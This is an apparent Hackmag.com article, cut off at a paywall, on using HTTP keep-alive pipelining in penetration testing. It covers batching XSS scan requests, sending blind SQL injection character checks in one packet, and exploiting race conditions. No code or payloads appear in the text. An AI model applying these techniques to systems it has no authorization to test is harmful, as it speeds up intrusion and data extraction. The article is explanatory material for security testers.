0-day attacks using “keep-alive” connections

Before turning to unconventional methods of usage, I will describe how “keep-alive” is working. The process is utterly simple – in a connection, multiple requests are sent instead of just one, and multiple responses come from the server. The benefits are obvious: there is less time spent on establishing connection, less load on CPU and memory. The number of requests in a single connection is usually limited by settings of the server (in most cases, there are at least several dozen). The procedure for establishing a connection is universal.

  1. In case of HTTP/1.0, the first request must contain the header Connection: keep-alive.
    If you are using ‘HTTP / 1.1’, there is no such header at all, but some servers will automatically close connections that are not declared as being persistent. Also, for example, an obstacle may be created by the header Expect: 100-continue. So, to avoid errors, it is recommended to forcibly add ‘keep-alive’ to every request.

    'Expect' forcibly closes the connection

    ‘Expect’ forcibly closes the connection

  2. When ‘keep-alive’ connection is specified, the server will look for the end of the first request. If the request does not contain data, the end will be deemed to be CRLF (these are ‘\r\n’ control characters, but often just two ‘\n’ will also work fine). The request is considered empty if it has no headers ‘Content-Length’, ‘Transfer-Encoding’, and if these headers have zero or incorrect content. If they are available and have correct value, the end of request will be the last content byte of declared length.

    The last byte of declared content may be immediately followed by the next request

    The last byte of declared content may be immediately followed by the next request

  3. If, after the first request, there are additional data, the steps ‘1’ and ‘2’ will be repeated for them until there are no more correctly formed requests.

Sometimes, even after the correct completion of the request, ‘keep-alive’ does not run as it should due to some unknown “magical” characteristics of the server and the script, to which is addressed the request. In this case, a forced initialization of connection by first HEAD request may prove to be helpful.

HEAD request launches the sequence of 'keep-alive'

HEAD request launches the sequence of ‘keep-alive’

Thirty by one or one by thirty?

No matter how funny it may sound, but the first and most obvious benefit is the ability to accelerate during certain types of web application scanning. Let’s review a simple example: we need to check a certain XSS vector in the application that includes ten scripts. Each script accepts three parameters.

I wrote the code for a small script in Python, which will run through all pages and check all parameters one by one, and then display the vulnerable scripts or parameters (let’s make four vulnerabilities) and time spent on scanning.

Let's try to run it. As a result, the runtime was 0.690999984741.

Local test without 'keep-alive'

Local test without 'keep-alive'

Now, let's try to run the same thing, but with a remote resource. In this case, the result was 3.0490000248.

Not bad, but now we will try to use 'keep-alive'. We will rewrite this script so that it will send all thirty requests in one connection, and then it will parse the response to extract the required values.

Let's try to run it locally. The result is 0.167000055313. When we run 'keep-alive' for remote resource, the result is 0.393999814987.

And all this despite the fact that I had to add 0.15 seconds to avoid any problems as a result of coding the request in Python. A very tangible difference, isn't it? And what if you had thousands of such pages?

Of course, the advanced products do not scan in a single stream, but the server settings may limit the number of allowed streams. In general, if you intelligently distribute the requests, the load under the persistent connection will be lower and the results will be obtained faster. Besides, the penetration testers may have different tasks, which often require custom scripts.

Shooting with injections

One such frequently faced routine task may be character by character examination of blind SQL injections. If we are not afraid for the server – and it is unlikely to "feel" worse than if you start to examine everything character by character or by using a binary search in multiple streams – then we can also use 'keep-alive' here to get maximum results with a minimum number of connections.

The operating principle is simple. We collect requests with all characters into a single packet and send it. If the responses contains a match with the condition 'true', then the only thing we need to do is to parse it in order to obtain the number for desired character by using the number of successful response.

Assembling a single packet with all characters and looking for the matched condition in the response

Assembling a single packet with all characters and looking for the matched condition in the response

Again, this can be useful, if the number of streams is limited or you cannot use other methods that accelerate the sorting of characters.

Unforeseen Circumstances

Because in case of 'keep-alive' connection the server does not wake up additional streams to handle the requests but methodically executes the requests in accordance with the queue, we can achieve lower latency between two requests. In certain circumstances, this could be useful to exploit logical errors of 'race condition' type. But is there anything that you can't do by using several parallel streams? Nevertheless, here is an example of exceptional situation that can occur only through 'keep-alive'.

Please subscribe to read full article

1 year

for only $29

With subscription you are free to read all of the materials of Hackmag.com.
Read more about the project


Please subscribe to view comments

Only subscribers can participate in the discussions. You may login in to your account or sign up to Hackmag and pay a subscription to access the discussions.